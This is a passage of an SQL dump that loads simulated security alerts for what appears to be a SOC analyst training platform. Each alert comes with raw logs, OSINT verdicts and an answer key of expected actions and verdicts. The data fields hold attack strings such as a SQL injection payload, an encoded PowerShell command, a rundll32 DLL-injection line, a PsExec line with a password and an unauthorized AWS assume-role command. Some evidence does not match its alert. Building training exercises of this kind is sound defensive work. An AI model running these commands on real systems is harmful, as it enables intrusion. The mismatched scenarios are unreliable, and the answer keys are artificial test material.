4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.5.20\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1393, 'Suspicious Command Execution on Workstation', 'medium', 'Elastic SIEM', 'A suspicious command was executed on a user workstation, potentially indicating malicious activity.', 'Command Execution', 'T1059', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T15:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.6.15\",\"dst_ip\":\"\",\"username\":\"klee\",\"hostname\":\"WORKSTATION03\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"Write-Host \'Hello World\'\\\"\"}', '2026-03-02 03:09:19', '2026-03-09 02:43:36', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"Write-Host \'Hello World\'\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Common administrative command\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.6.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"klee\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Regular user account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"command_execution\",\"analysis_notes\":\"The command executed is a common administrative task, indicating a false positive.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"klee\\\",\\\"hostname\\\":\\\"WORKSTATION03\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"Write-Host \'Hello World\'\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"klee\\\",\\\"hostname\\\":\\\"WORKSTATION03\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"Write-Host \'Hello World\'\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"klee\\\",\\\"hostname\\\":\\\"WORKSTATION03\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"Write-Host \'Hello World\'\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"klee\\\",\\\"hostname\\\":\\\"WORKSTATION03\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"Write-Host \'Hello World\'\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"klee\\\",\\\"hostname\\\":\\\"WORKSTATION03\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"Write-Host \'Hello World\'\\\\\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1394, 'Failed Remote Desktop Login Attempts', 'low', 'Azure Sentinel', 'Multiple failed remote desktop login attempts from an external IP with no known malicious activity.', 'Brute Force', 'T1110', 0, 'investigating', 258, '{\"timestamp\":\"2026-03-02T16:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.67\",\"dst_ip\":\"192.168.7.30\",\"username\":\"administrator\",\"hostname\":\"SERVER02\",\"failed_attempts\":8}', '2026-03-02 03:09:19', '2026-03-06 15:22:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this IP\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.7.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is not associated with malicious activity, indicating a false positive.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.7.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"SERVER02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-02T13:54:06.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.7.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"SERVER02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-02T13:53:06.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.7.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"SERVER02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-02T13:52:06.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.7.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"SERVER02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-02T13:51:06.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.7.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"SERVER02\\\",\\\"failed_attempts\\\":8}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1395, 'Ransomware Detected: LockBit 3.0 Process Injection on EHR Server', 'critical', 'CrowdStrike', 'LockBit 3.0 ransomware detected via process injection technique on the Electronic Health Records (EHR) server, targeting sensitive patient data.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T10:12:34Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.50.2\",\"username\":\"ehr_admin\",\"hostname\":\"EHR-SERVER01\",\"command_line\":\"rundll32.exe inject.dll,EntryPoint\"}', '2026-03-02 03:10:27', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 347 times for ransomware activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.50.2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal EHR server\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"rundll32.exe inject.dll,EntryPoint\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Identified as LockBit 3.0 ransomware process injection\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Confirmed process injection and malicious IP linked to LockBit 3.0 ransomware.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1396, 'Phishing Attempt: Malicious URL in Email', 'high', 'Proofpoint', 'Phishing email received with a malicious URL targeting healthcare professionals to steal credentials.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T08:45:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"204.0.114.55\",\"dst_ip\":\"192.168.1.25\",\"username\":\"john.doe@hospital.org\",\"hostname\":\"MAIL-SERVER01\",\"email_sender\":\"support@fakesupport.com\",\"url\":\"http://malicious-link.com/login\"}', '2026-03-02 03:10:27', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"204.0.114.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"support@fakesupport.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email domain known for phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts phishing landing page\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Phishing email with malicious URL confirmed; sender and URL flagged in multiple databases.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt: Malicious URL in Email\",\"date\":\"2026-03-02T13:55:06.933Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1397, 'Suspicious Internal Network Traffic', 'medium', 'Sysmon', 'Detected unusual internal network traffic suggesting potential lateral movement using PsExec.', 'Lateral Movement', 'T1077', 0, 'New', NULL, '{\"timestamp\":\"2026-03-02T09:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"192.168.2.15\",\"username\":\"network_admin\",\"hostname\":\"ADMIN-PC01\",\"command_line\":\"PsExec.exe \\\\\\\\192.168.2.15 -u admin -p password\"}', '2026-03-02 03:10:27', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal admin workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\192.168.2.15 -u admin -p password\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate use of PsExec for system management\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Traffic resulted from legitimate administrative tasks; no indicators of compromise.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"ADMIN-PC01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.2.15 -u admin -p password\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"ADMIN-PC01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.2.15 -u admin -p password\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"ADMIN-PC01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.2.15 -u admin -p password\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"ADMIN-PC01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.2.15 -u admin -p password\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"ADMIN-PC01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.2.15 -u admin -p password\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1398, 'Unauthorized Access to AWS S3 Bucket Detected', 'high', 'AWS GuardDuty', 'A foreign IP address was detected attempting to access an unsecured S3 bucket containing sensitive healthcare data. This activity may indicate a data exfiltration attempt.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T10:05:23Z\",\"event_type\":\"web_request\",\"src_ip\":\"54.172.98.101\",\"dst_ip\":\"192.168.1.25\",\"username\":\"john.doe\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-bucket/records\",\"command_line\":\"\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"54.172.98.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"s3.amazonaws.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Potential data exfiltration vector\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The foreign IP attempting to access sensitive data without authorization suggests a data exfiltration attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.935Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:05:23Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"54.172.98.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"GET /sensitive-bucket/records\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.935Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:05:23Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"54.172.98.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"GET /sensitive-bucket/records\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.935Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:05:23Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"54.172.98.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"GET /sensitive-bucket/records\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.935Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:05:23Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"54.172.98.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"GET /sensitive-bucket/records\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.935Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:05:23Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"54.172.98.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"GET /sensitive-bucket/records\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1399, 'Potential IAM Privilege Escalation Detected', 'critical', 'AWS GuardDuty', 'An IAM user attempted to assume an administrator role without prior authorization. This may indicate an internal attack or credential compromise.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T11:45:18Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"10.1.1.7\",\"username\":\"malicious_user\",\"hostname\":\"aws.amazon.com\",\"request_body\":\"\",\"command_line\":\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Known command for unauthorized privilege escalation\"}}],\"expected_actions\":[\"reset_credentials\",\"collect_forensics\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"IAM user attempting to escalate privileges without authorization is indicative of a potential insider threat or compromised account.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.936Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:18Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"10.1.1.7\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"aws.amazon.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.936Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:18Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"10.1.1.7\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"aws.amazon.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.936Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:18Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"10.1.1.7\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"aws.amazon.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.936Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 